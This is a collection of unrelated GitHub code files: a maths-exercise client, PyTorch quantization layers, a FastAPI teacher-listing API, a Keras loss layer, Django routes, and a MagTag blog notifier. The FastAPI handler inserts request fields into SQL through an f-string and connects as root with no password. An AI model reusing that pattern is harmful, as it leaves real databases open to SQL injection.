:\n print(\"Tasks :\", bd)\n\n\ndef accepted_tasks() :\n user = get_user()\n path = service + '/users/' + user\n s,r,bd = do_request(\"GET\",host,path)\n if s == 200 :\n print(\"Accepted tasks :\",bd)\n elif s == 404 :\n print(s,r,\"User not found\\n\",bd)\n else :\n print(\"Error :\",s,r,bd)\n\n\n__help = \"\"\"\nCe module définit trois fonctions :\n\nhello() : Est-ce que le serveur vous connait ?\n\ntasklist() : List des exos.\n\nshow_example(exo) : Cette fonction affiche des exemples pour\n l'exercice spécifié par l'entier exo.\n\nget_task(exo) : Cette fonction prend comme argument\n un entier qui est un numéro d'exercice.\n Elle renvoie un couple (id,param) où\n id est un numéro identifiant le dataset\n param est l'argument pour la fonction\n client.\n\ncheck_task(exo,id,result) : Cette fonction envoie le resultat de la\n fonction client.\n\naccepted_tasks() : Liste des taches acceptees.\n\nset_user(user) : Définir le nom d'utilisateur.\n\nvalid_() : Valider un exercice.\n\nvalid_tasks() : Valider l'ensemble des exercices.\n\ngenerate_primes(n,ppath) : Génère la liste des nombres premiers\n inférieurs à n et enregistre cette liste\n dans le fichier ppath au format json.\n\nAlexis Giraudet\n\"\"\"\n\ndef info() : print(__help)\n \nif __name__ == \"__main__\" :\n info()\n\n# Alexis Giraudet\n\nimport math, json, threading\n\ndef trivialtask(ls):\n ls.reverse()\n return ls\n\ndef valid_trivialtask():\n print(\"valid trivialtask...\")\n (idt, paramt) = get_task(\"trivialtask\")\n print(\"id =\", idt)\n print(\"param =\", paramt)\n result = trivialtask(paramt)\n print(\"result =\", result)\n check_task(\"trivialtask\", idt, result)\n\ndef base_ecriture(ls):\n res = list()\n for i in ls:\n n = list()\n quo = i[0]\n base = i[1]\n while quo > 0:\n n.insert(0, quo % base)\n quo = quo // base\n res.append(n)\n return res\n\ndef valid_base_ecriture():\n print(\"valid base_ecriture...\")\n (idt, paramt) = get_task(\"base_ecriture\")\n print(\"id =\", idt)\n print(\"param =\", paramt)\n result = base_ecriture(paramt)\n print(\"result =\", result)\n check_task(\"base_ecriture\", idt, result)\n\ndef primes(ls):\n res = list()\n for i in ls:\n if i < 2:\n res.append(False)\n else:\n for n in range(2, int(math.sqrt(i))+1):\n if (i % n) == 0:\n res.append(False)\n break\n else:\n res.append(True)\n return res\n\ndef valid_primes():\n print(\"valid primes...\")\n (idt, paramt) = get_task(\"primes\")\n print(\"id =\", idt)\n print(\"param =\", paramt)\n result = primes(paramt)\n print(\"result =\", result)\n check_task(\"primes\", idt, result)\n\ndef factors(ls, ppath=\"./prime_numbers.json\"):\n res = list()\n pr = list()\n try:\n with open(ppath, \"r\") as pfile:\n print(\"load prime numbers from file...\")\n pr = json.load(pfile)\n print(len(pr), \"prime numbers loaded from file\")\n pfile.close()\n except IOError:\n pr = [2,3]\n for i in ls:\n print(\"number =\", i)\n if primes([i]) == [True]:\n res.append([[i,1]])\n else:\n fa = list()\n dcc = i\n for p in pr:\n if (dcc % p) == 0:\n acc = 0\n while ((dcc % p) == 0) and (dcc > 1):\n acc += 1\n dcc = dcc // p\n fa.append([p,acc])\n if dcc == 1:\n break\n else:\n print(\"generate new prime numbers...\")\n for j in range(pr[-1]+2,i,2):\n if primes([j]) == [True]:\n pr.append(j)\n if (dcc % j) == 0:\n acc = 0\n while ((dcc % j) == 0) and (dcc > 1):\n acc += 1\n dcc = dcc // j\n fa.append([j,acc])\n if dcc == 1:\n break\n res.append(fa)\n return res\n\ndef valid_factors():\n print(\"valid factors...\")\n (idt, paramt) = get_task(\"factors\")\n print(\"id = \", idt)\n print(\"param =\", paramt)\n result = factors(paramt)\n print(\"result = \", result)\n check_task(\"factors\", idt, result)\n\ndef stirling_rec(ls):\n def stirling(m, n):\n if m < n:\n return 0\n elif m == n:\n return math.factorial(m)\n elif n == 1:\n return 1\n elif n == 2:\n return (2**m)-2\n else:\n return n*(stirling(m-1, n) + stirling(m-1, n-1))\n return stirling(ls[0], ls[1])\n\ndef stirling(ls):\n if ls[0] < ls[1]:\n return 0\n elif ls[0] == ls[1]:\n return math.factorial(m)\n elif ls[1] == 1:\n return 1\n else:\n lm0 = dict()\n lm0[1] = 1\n lm1 = dict()\n for m in range(1,ls[0]-1):\n for n in range(1,ls[1]+1):\n try:\n sm1n = lm0[n]\n except:\n sm1n = 0\n try:\n sm1n1 = lm0[n-1]\n except:\n sm1n1 = 0\n lm1[n] = n*(sm1n+sm1n1)\n lm0 = lm1\n lm1 = dict()\n return ls[1]*(lm0[ls[1]]+lm0[ls[1]-1])\n\ndef valid_stirling():\n print(\"valid stirling...\")\n (idt, paramt) = get_task(\"stirling\")\n print(\"id = \", idt)\n print(\"param =\", paramt)\n result = stirling(paramt)\n print(\"result = \", result)\n check_task(\"stirling\", idt, result)\n\ndef bezout(ls):\n a = ls[0]\n b = ls[1]\n def bezout(u,v,r,uu,vv,rr):\n if rr == 0:\n return [r, u, v]\n else:\n q = r//rr\n return bezout(uu,vv,rr,u-q*uu,v-q*vv,r-q*rr)\n return bezout(1,0,a,0,1,b)\n\ndef valid_bezout():\n print(\"valid bezout...\")\n (idt, paramt) = get_task(\"bezout\")\n print(\"id = \", idt)\n print(\"param =\", paramt)\n result = bezout(paramt)\n print(\"result = \", result)\n check_task(\"bezout\", idt, result)\n\ndef valid_tasks():\n tasklist()\n print()\n valid_trivialtask()\n print()\n valid_base_ecriture()\n print()\n valid_primes()\n print()\n valid_factors()\n print()\n valid_stirling()\n print()\n valid_bezout()\n print()\n accepted_tasks()\n\ndef generate_primes(n=50000000, ppath=\"./prime_numbers.json\"):\n with open(ppath, \"w\") as pfile:\n pr = list()\n pr.append(2)\n for i in range(3,n,2):\n if primes([i]) == [True]:\n pr.append(i)\n json.dump(pr,pfile)\n pfile.close()\n\nclass primes_async(threading.Thread):\n def __init__(self, list_e, list_p):\n threading.Thread.__init__(self)\n self.list_e = list_e\n self.list_p = list_p\n\n def run(self):\n while len(self.list_e) > 0:\n try:\n i = self.list_e.pop()\n if primes([i]) == [True]:\n self.list_p.append(i)\n except IndexError:\n break\n\ndef generate_primes_async(n=50000000, ppath=\"./prime_numbers.json\", nthreads=4):\n with open(ppath, \"w\") as pfile:\n list_e = list(range(3,n,2))\n list_p = list()\n list_p.append(2)\n \n list_t = list()\n for i in range(nthreads):\n t = primes_async(list_e, list_p)\n t.start()\n list_t.append(t)\n for t in list_t:\n t.join()\n list_p.sort()\n json.dump(list_p,pfile)\n pfile.close()\n","repo_name":"Giraudux/python3-maths","sub_path":"src/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73733246330","text":"\nimport copy\nfrom typing import Sequence\nimport torch\nfrom torch.functional import Tensor\nimport torch.nn as nn\nimport os\n\nfrom zmq import device \n#from .pwlq import *\nfrom .uniform import *\n\n##########################################################################################\n#### Quantization of Activations \n##########################################################################################\n\nclass QuantAct(nn.Module):\n '''\n Quantize actications including:\n (1) the input of conv layer\n (2) the input of linear fc layer\n (3) the input of pooling layer\n '''\n def __init__(self, act_bits, get_stats, minv=None, maxv=None, \n cali_sample_size=512, cali_batch_size=4, topk=10):\n '''\n cali_sample_size: calibration sample size, typically from random training data\n cali_batch_size: calibration sampling batch size\n topk: calibrate topk lower and upper bounds\n '''\n super(QuantAct, self).__init__()\n self.act_bits = act_bits\n self.get_stats = get_stats\n self.index = 0\n self.topk = topk\n self.sample_batches = cali_sample_size // cali_batch_size\n stats_size = (self.sample_batches, self.topk) if self.get_stats else 1\n self.register_buffer('minv', torch.zeros(stats_size))\n self.register_buffer('maxv', torch.zeros(stats_size))\n\n def forward(self, x):\n if self.get_stats:\n y = x.clone()\n y = torch.reshape(y, (-1,))\n y, indices = torch.sort(y)\n topk_mins = y[:self.topk]\n topk_maxs = y[-self.topk:]\n if self.index < self.sample_batches:\n self.minv[self.index, :] = topk_mins\n self.maxv[self.index, :] = topk_maxs\n self.index += 1\n\n if self.act_bits > 0:\n ## uniform quantization\n print (self.minv,'===')\n if self.minv is not None:\n if self.minv >= 0.0: # activation after relu\n self.minv *= 0.0\n self.signed = False\n else: \n self.maxv = max(-self.minv, self.maxv) \n self.minv = - self.maxv\n self.signed = True\n x = uniform_symmetric_quantizer(x, bits=self.act_bits, \n minv=self.minv, maxv=self.maxv, signed=self.signed)\n return x\n\n\ndef quant_model_acts(model, act_bits, get_stats, cali_batch_size=4):\n \"\"\"\n Add quantization of activations for a pretrained model recursively\n \"\"\"\n if type(model) in [nn.Conv2d, nn.Linear, nn.AdaptiveAvgPool2d]:\n quant_act = QuantAct(act_bits, get_stats, cali_batch_size=cali_batch_size)\n return nn.Sequential(quant_act, model)\n elif type(model) == nn.Sequential:\n modules = []\n for name, module in model.named_children():\n modules.append(quant_model_acts(module, act_bits, get_stats, cali_batch_size=cali_batch_size))\n return nn.Sequential(*modules)\n else:\n quantized_model = copy.deepcopy(model)\n for attribute in dir(model):\n module = getattr(model, attribute)\n if isinstance(module, nn.Module):\n setattr(quantized_model, attribute, \n quant_model_acts(module, act_bits, get_stats, cali_batch_size=cali_batch_size))\n return quantized_model\n\n\ndef simple_quant_mode_acts(model,bit=8,name='',mode='monitor'):\n\n if type(model) in [nn.Conv2d]:\n if mode == 'monitor':\n return nn.Sequential(model,SimpleLimit(name=name,mode='monitor'))\n if mode == 'qunatized_act':\n return nn.Sequential(SimpleQunAct(name=name),model,SimpleLimit(name=name))\n if type(model) == nn.Sequential:\n output = []\n num = 0\n for name_,modules in model.named_children():\n output.append(simple_quant_mode_acts(modules,name=(name+str(num)) ))\n num+=1\n return nn.Sequential(*output)\n \n\n quantized_model = copy.deepcopy(model)\n for attribute in dir(model):\n module = getattr(model, attribute)\n if isinstance(module, nn.Module):\n setattr(quantized_model, attribute,simple_quant_mode_acts(module,name=(name+attribute)))\n return quantized_model\n\n\n\n\n\nclass SimpleQunAct(nn.Module):\n allLayer = []\n def __init__(self,bit=8,mode='forward',function='None',name='') -> None:\n super(SimpleQunAct, self).__init__()\n self.bit = bit\n self.mode = mode\n self.func = function\n self.name = name\n self.maxQ = None\n self.minQ = None\n SimpleQunAct.allLayer.append(self)\n\n def __repr__(self):\n return super().__repr__()[:-1]+self.name+ '('+self.mode+'_'+self.func +'))'\n\n def load_min_max(self,addr):\n pass\n self.maxQ = torch.load(os.path.join(addr,self.name+'_max.pt'))\n self.minQ = torch.load(os.path.join(addr,self.name+'_min.pt'))\n\n\n\n def forward(self,x):\n if self.mode == 'forward':\n #print ('-'*100)\n #print (self.maxQ.shape)\n #print (x.shape)\n \n \n return x\n if self.mode == 'monitor':\n if self.func == 'Border':\n if self.maxQ is not None:\n temp = torch.amax(x,dim=(0,2,3))\n self.maxQ = torch.max(temp,self.maxQ)\n else:\n self.maxQ = torch.amax(x,dim=(0,2,3))\n\n if self.minQ is not None:\n temp = torch.amin(x,dim=(0,2,3))\n self.minQ = torch.min(temp,self.minQ)\n else:\n self.minQ = torch.amin(x,dim=(0,2,3))\n\n\n\n return x \n if self.mode == 'quan':\n\n\n return x\n\n\nclass SimpleLimit(nn.Module):\n allLayer = []\n def __init__(self,mode='forward',name='') -> None:\n super(SimpleLimit, self).__init__()\n self.mode = mode\n self.name = name\n self.maxQ = None\n self.minQ = None\n SimpleLimit.allLayer.append((name,self))\n\n\n def save_min_max(self,path):\n min_addr = os.path.join(path,self.name+'_min.pt')\n max_addr = os.path.join(path,self.name+'_max.pt')\n torch.save(self.minQ,min_addr)\n torch.save(self.maxQ,max_addr)\n\n def load_min_max(self,path):\n min_addr = os.path.join(path,self.name+'_min.pt')\n max_addr = os.path.join(path,self.name+'_max.pt')\n self.minQ = torch.load(min_addr)\n self.maxQ = torch.load(max_addr)\n\n\n def setMode(self,newMode):\n self.mode = newMode\n\n def __repr__(self):\n return super().__repr__()[:-1]+self.name+'('+self.mode+'))'\n\n def forward(self,x):\n if self.mode == 'forward':\n return x\n if self.mode == 'monitor':\n if self.maxQ is not None:\n temp = torch.amax(x,dim=(0,2,3))\n self.maxQ = torch.max(temp,self.maxQ)\n else:\n self.maxQ = torch.amax(x,dim=(0,2,3))\n \n if self.minQ is not None:\n temp = torch.amin(x,dim=(0,2,3))\n self.minQ = torch.min(temp,self.minQ)\n else:\n self.minQ = torch.amin(x,dim=(0,2,3))\n return x \n if self.mode == 'org_bound':\n for i in range(x.shape[1]):\n x[:,i,:,:] = torch.clamp(x[:,i,:,:],min=self.minQ[i],max=self.maxQ[i])\n\n return x\n\n if self.mode == 'limit_bound':\n for i in range(x.shape[1]):\n x[:,i,:,:] = torch.clamp(x[:,i,:,:],min=self.minQ[i]*self.limit,max=self.maxQ[i]*self.limit)\n\n return x\n\n\n if self.mode == 'quan':\n return x\n","repo_name":"alisahebdad/simple-quantization","sub_path":"quant/quant_acts.py","file_name":"quant_acts.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6001795472","text":"from fastapi import FastAPI\nimport pymysql.cursors\nfrom fastapi.responses import JSONResponse\nfrom AMP.modelos.professor import ProfessorCadastro\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom AMP.algoritmos import quicksort, bubblesort\nimport time\n\ndef abre_conexao(nome_db):\n conexao = pymysql.connect(\n host = '127.0.0.1',\n user = 'root',\n password = '',\n db = nome_db,\n charset = 'utf8mb4',\n cursorclass = pymysql.cursors.DictCursor\n )\n return conexao\n\ndef fecha_conexao(conexao, cursor):\n cursor.close()\n conexao.close()\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n@app.get('/professor')\nasync def recupera_prof():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n fecha_conexao(conexao, cursor)\n return {\"resposta\":dados, 'tempo':0, 'numero':len(dados)}\n\n@app.post('/professor', status_code=201)\nasync def cadastra_prof(professor:ProfessorCadastro):\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n query = f'insert into professor(nome, preco, materia, contato, obs) values(\"{professor.nome}\", {professor.preco}, \"{professor.materia}\", \"{professor.contato}\", \"{professor.obs}\");'\n cursor.execute(query)\n\n id_retorno = cursor.lastrowid\n\n fecha_conexao(conexao, cursor)\n\n return {'id_cadastrado':id_retorno}\n\n@app.get('/prof_quick_preco')\nasync def recupera_prof_quick():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n quicksort(dados, 0, len(dados)-1, 'preco')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}\n\n@app.get('/prof_quick_nome')\nasync def recupera_prof_quick():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n quicksort(dados, 0, len(dados)-1, 'nome')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}\n\n@app.get('/prof_bubble_preco')\nasync def recupera_prof_bubble():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n bubblesort(dados, len(dados),'preco')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}\n\n@app.get('/prof_bubble_nome')\nasync def recupera_prof_bubble():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n bubblesort(dados, len(dados),'nome')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}","repo_name":"pedrofaleiros/projeto","sub_path":"api/AMP/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11318733801","text":"import art\r\nimport os\r\n\r\n\r\ndef highest_bidder(bid_record):\r\n score = 0\r\n for bidder in bid_record:\r\n bidder_score = bid_record[bidder]\r\n if bidder_score > score:\r\n score = bidder_score\r\n current_winner = bidder\r\n print(f\"The winner is {current_winner} with a bid of ${score}\")\r\n\r\n\r\nprint(art.logo)\r\nbidders = {}\r\ngame_on = True\r\n\r\nwhile game_on:\r\n name = input(\"Enter the bidders name: \")\r\n bid_price = float(input(\"Enter bidding price: \"))\r\n\r\n bidders[name] = bid_price\r\n more_bidders = input(\"Are there any more bidders? 'yes' or 'no'? \").lower()\r\n if more_bidders == 'no':\r\n game_on = False\r\n highest_bidder(bidders)\r\n elif more_bidders == 'yes':\r\n os.system('cls')\r\n pass\r\n else:\r\n print(\"invalid choice.\")\r\n","repo_name":"PeterPan2151/100_Python_days_codes","sub_path":"Day_9/project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2359438701","text":"import tensorflow as tf\nimport tensorflow.keras.backend as K\nimport numpy as np\n\nclass ContrastiveCenterLossLayer(tf.keras.layers.Layer):\n\n def __init__(self, class_count, alpha=0.5, delta = 1.0, **kwargs):\n super().__init__(**kwargs)\n self.alpha = alpha\n self.class_count = class_count\n #self.ones = K.ones((1, self.class_count, 1), dtype=np.float32)\n self.ones = dict()\n self.ones[str(None)] = K.ones((1, self.class_count, 1), dtype=np.float32)\n self.delta = K.constant(delta)\n\n def build(self, input_shape):\n features_count = 1\n for i in range(1, len(input_shape[0])):\n features_count *= input_shape[0][i]\n\n self.centers = self.add_weight(name='centers',\n shape=(1, self.class_count, features_count),\n initializer='uniform',\n trainable=False)\n # self.counter = self.add_weight(name='counter',\n # shape=(1,),\n # initializer='zeros',\n # trainable=False) # just for debugging\n super().build(input_shape)\n\n def call(self, x, mask=None):\n # x[0] is NxF, x[1] is NxC label, self.centers is 1xCxF\n\n #preparing elements\n FV = x[0]\n L = x[1]\n FV = tf.expand_dims(FV, axis = -1)\n L = tf.expand_dims(L, axis = -1)\n centers_N = self.centers\n\n\n ### FORWARD PASS ###\n\n #print('FV:', FV.shape)\n #print('L:', L.shape)\n #print('CN:', centers_N.shape)\n\n # 1_c(N, C, 1) FV(N, F, 1)\n # 1_c * FV^T - (N, C, F)\n ones = None\n try:\n ones = self.ones[str(FV.shape[0])]\n except:\n self.ones[str(FV.shape[0])] = K.repeat_elements(self.ones[str(None)], FV.shape[0], axis=0)\n ones = self.ones[str(FV.shape[0])]\n #print(ones)\n\n FVV = K.batch_dot(ones, FV, (2, 2))\n \n #print('FVV:', FVV.shape)\n #(N, C, F)\n dFVV = FVV - centers_N\n #print('dFVV:', dFVV.shape)\n #(N, C, 1)\n dFVV2 = K.sum(dFVV ** 2, axis = 2, keepdims = True)\n #print('dFVV2:', dFVV2.shape)\n\n # L(N, C, 1) dFVV2(N, C, 1)\n # L^T * dFVV2 - (N, 1, 1)\n NUM = K.batch_dot(L, dFVV2, (1, 1))\n #print('NUM:', NUM.shape)\n\n #inverse_L (N, C, 1)\n inverse_L = ones - L\n\n # _L(N, C, 1) dFVV2(N, C, 1)\n # _L^T * dFVV2 - (N, 1, 1)\n DENUM = K.batch_dot(inverse_L, dFVV2, (1, 1))\n DENUM = DENUM + self.delta\n #print('DENUM:', DENUM.shape)\n \n\n #CCL - (N, 1, 1)\n CLPerSample = NUM / DENUM\n\n #CCL = (N, 1)\n CLPerSample = K.reshape(CLPerSample, (-1, 1))\n #print('res:', CLPerSample.shape)\n\n ### BACKWARD PASS ###\n\n #(N, 1, 1)\n DENUM2 = DENUM ** 2\n \n # -(N, C, F) * (N, C, 1) = (N, C, F)\n true_update_part = -dFVV * L\n #(N, C, F) /= (N, 1, 1)\n true_update_part /= DENUM\n #print('TUP:', true_update_part.shape)\n\n # (N, C, F) * (N, 1, 1) * (N, C, 1) = (N, C, F)\n false_update_part = dFVV * NUM * inverse_L\n #(N, C, F) /= (N, 1, 1)\n false_update_part /= DENUM2\n #print('FUP:', false_update_part.shape)\n #(N, C, F)\n update = true_update_part + false_update_part\n #(1, C, F)\n update = K.sum(update, axis = 0, keepdims = True)\n #print('U:', update.shape)\n new_centers = self.centers - self.alpha*update \n #print('NC:', new_centers.shape)\n\n self.add_update((self.centers, new_centers))\n\n return CLPerSample\n\n ### END ### \n\n def compute_output_shape(self, input_shape):\n return tf.keras.backend.int_shape(self.result)","repo_name":"Skwoogey/TinyNet","sub_path":"ContrastiveCenterLossLayer.py","file_name":"ContrastiveCenterLossLayer.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31434395207","text":"from django.urls import path, re_path\n\nfrom content.views import comments, my_comment, my_comments, VideoContentsViewSet, VideoContentViewSet, \\\n MyVideoContentViewSet, MyVideoContentsViewSet, PlaylistViewSet, MyPlaylistsViewSet\n\nurlpatterns = [\n path('contents', VideoContentsViewSet.as_view({\n 'get': 'list',\n \"post\": 'create'\n })),\n path('contents/me', MyVideoContentsViewSet.as_view({\n 'get': 'list'\n })),\n path('contents/me/', MyVideoContentViewSet.as_view({\n 'get': 'retrieve',\n \"put\": 'update',\n 'delete': 'destroy'\n })),\n path('contents/', VideoContentViewSet.as_view({\n 'get': 'retrieve'\n })),\n re_path(r'^contents/(?P\\w+)/save(?:undo=(?P\\d+))?$',\n VideoContentViewSet.as_view({'put': 'save'})),\n re_path(r'^contents/(?P\\w+)/like(?:dislike=(?P\\d+)&retract=(?P\\d+))?$',\n VideoContentViewSet.as_view({'put': 'like'})),\n path('contents//like/status', VideoContentViewSet.as_view({'get': 'like_status'})),\n path('contents//comments', comments),\n path('contents//comments/me', my_comments),\n path('contents//comments/me/', my_comment),\n path('playlists', PlaylistViewSet.as_view({'post': 'create'})),\n path('playlists/', PlaylistViewSet.as_view({'get': 'retrieve'})),\n re_path(r'^playlists/(?P\\d+)/save(?:undo=(?P\\d+))?$',\n PlaylistViewSet.as_view({'put': 'save'})),\n path('playlists/me', MyPlaylistsViewSet.as_view({'get': 'list'})),\n path('playlists/me/', MyPlaylistsViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n }))\n]\n","repo_name":"Aldeshov/youtube.api","sub_path":"content/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40071431066","text":"import os\nfrom glob import glob\nfrom setuptools import setup\nfrom setuptools import find_packages\n\n\n\npackage_name = 'drone_model'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (os.path.join('share', package_name), glob('launch/*.py')),\n (os.path.join('share', package_name, \"urdf\"), glob('urdf/*')),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='root',\n maintainer_email='christian.peeren@rwth-aachen.de',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'propeller = drone_model.propeller:main',\n 'propellerSingle = drone_model.propellerSingle:main',\n 'controller = drone_model.controller:main',\n ],\n },\n)\n","repo_name":"cmb87/project-arm","sub_path":"droneAndOtherMixedStuff/server/src/drone_model/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20909275200","text":"import time\nimport gc\nimport wifi\nimport random\nimport adafruit_requests\nimport ssl\nimport socketpool\nimport terminalio\nfrom adafruit_magtag.magtag import MagTag\n\nmagtag = MagTag()\n\n# Add a secrets.py to your filesystem that has a dictionary called secrets with \"ssid\" and\n# \"password\" keys with your WiFi credentials. DO NOT share that file or commit it into Git or other\n# source control.\n# pylint: disable=no-name-in-module,wrong-import-order\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"Credentials and tokens are kept in secrets.py, please add them there!\")\n raise\n\nprint(\"Connecting to %s\" % secrets[\"ssid\"])\nwifi.radio.connect(secrets[\"ssid\"], secrets[\"password\"])\nprint(\"Connected to %s!\" % secrets[\"ssid\"])\n\npool = socketpool.SocketPool(wifi.radio)\nrequests = adafruit_requests.Session(pool, ssl.create_default_context())\n\nendpoint = \"https://graphql.contentful.com/content/v1/spaces/%s/\" % (\n secrets[\"space_id\"]\n)\nheaders = {\"Authorization\": \"Bearer %s\" % (secrets[\"CDA_token\"])}\n\n# Get Dev Blog Posts\nquery = \"\"\"query {\n blogPostCollection {\n items {\n sys {\n id\n }\n }\n }\n}\"\"\"\n\nprint(\"Making blog post collection query.\")\nresponse = requests.post(endpoint, json={\"query\": query}, headers=headers)\n\n# Get Individual Post\nquery = \"\"\"{\n blogPost(id: \\\"%s\\\") {\n title\n publishDate\n slug\n authorsCollection {\n items {\n name\n }\n }\n introduction\n }\n}\n\"\"\" % (\n random.choice(response.json()[\"data\"][\"blogPostCollection\"][\"items\"])[\"sys\"][\"id\"]\n)\n\nprint(\"Making blog post query.\")\nresponse = requests.post(endpoint, json={\"query\": query}, headers=headers)\n\n# Formatting for the title text\nmagtag.add_text(\n text_font=\"/fonts/Lato-Bold-ltd-25.bdf\",\n text_position=(10, 15),\n)\nmagtag.set_text(response.json()[\"data\"][\"blogPost\"][\"title\"], auto_refresh=False)\n\n# Formatting for the author text\nmagtag.add_text(\n text_font=\"/fonts/Arial-Bold-12.pcf\",\n text_position=(10, 38),\n)\n\nauthor_string = \"\"\nfor author in response.json()[\"data\"][\"blogPost\"][\"authorsCollection\"][\"items\"]:\n if author_string == \"\":\n author_string = author[\"name\"]\n else:\n author_string = author_string + \" & \" + author[\"name\"]\n\nmagtag.set_text(\n val=author_string,\n index=1,\n auto_refresh=False,\n)\n\n# Formatting for the publish date\nmagtag.add_text(\n text_font=\"/fonts/Arial-12.bdf\",\n text_position=(10, 60),\n)\n\nyear = int(response.json()[\"data\"][\"blogPost\"][\"publishDate\"][0:4])\nmonth = int(response.json()[\"data\"][\"blogPost\"][\"publishDate\"][5:7])\nday = int(response.json()[\"data\"][\"blogPost\"][\"publishDate\"][8:10])\n\nmonths = [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\",\n]\n\nstrdate = \"Published %s %d, %s\" % (months[month - 1], day, year)\nprint(strdate)\n\nslug = response.json()[\"data\"][\"blogPost\"][\"slug\"]\n\nblog_url = f\"https://www.contentful.com/blog/{year}/{month:02}/{day:02}/{slug}/\"\n\nmagtag.set_text(val=strdate, index=2, auto_refresh=False)\n# Formatting for the introduction text\nmagtag.add_text(\n text_font=terminalio.FONT,\n text_position=(10, 94),\n line_spacing=0.8,\n text_wrap=47, # wrap text at this count\n)\n\nmagtag.set_text(\n val=response.json()[\"data\"][\"blogPost\"][\"introduction\"][0:170] + \"...\",\n index=3,\n)\n\nendpoint = \"https://api.courier.com/send/\"\nheaders[\"Authorization\"] = \"Bearer %s\" % (secrets[\"courier_token\"])\nheaders[\"Accept\"] = \"application/json\"\nheaders[\"Content-Type\"] = \"application/json\"\n\ncourier_JSON = {\n \"event\": \"MAGTAG_NOTIFICATION\",\n \"recipient\": \"discord_channel\",\n \"data\": {\n \"title\": response.json()[\"data\"][\"blogPost\"][\"title\"],\n \"introduction\": response.json()[\"data\"][\"blogPost\"][\"introduction\"][0:170]\n + \"...\",\n \"url\": blog_url,\n \"author\": author_string,\n \"publish_date\": strdate,\n },\n}\n\nbutton_colors = ((255, 0, 0), (255, 150, 0), (0, 255, 255), (180, 0, 255))\nbutton_tones = (1047, 1318, 1568, 2093)\n\nbutton_a_pressed = False\n\nprint(\"Starting the loop, go ahead and press some buttons. :)\")\nwhile True:\n if magtag.peripherals.button_a_pressed:\n if button_a_pressed == False:\n for i, b in enumerate(magtag.peripherals.buttons):\n magtag.peripherals.neopixel_disable = False\n magtag.peripherals.neopixels[i] = button_colors[i]\n time.sleep(0.25)\n magtag.peripherals.neopixels[i] = (0, 0, 0)\n print(\"Making request to Courier\")\n response = requests.post(endpoint, json=courier_JSON, headers=headers)\n button_a_pressed = True\n print(\"Courier response: \")\n print(response.json())\n\n if magtag.peripherals.button_d_pressed:\n for i, b in enumerate(magtag.peripherals.buttons):\n magtag.peripherals.neopixel_disable = False\n magtag.peripherals.neopixels[i] = button_colors[i]\n time.sleep(0.25)\n magtag.peripherals.neopixels[i] = (0, 0, 0)\n # magtag.peripherals.play_tone(button_tones[i], 0.25)\n else:\n button_a_pressed = False\n magtag.peripherals.neopixel_disable = True\npass\n","repo_name":"Shy/MagTag-Contentful-Courier","sub_path":"src/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"14721586603","text":"\nimport numpy as np\nimport pandas as pd\nimport re\nimport numpy as np\nimport rdkit\nfrom rdkit import Chem\nimport os\nimport pybel\nimport tqdm\nimport argparse\nimport math\nimport torch\n\nvoc_set=['pad', 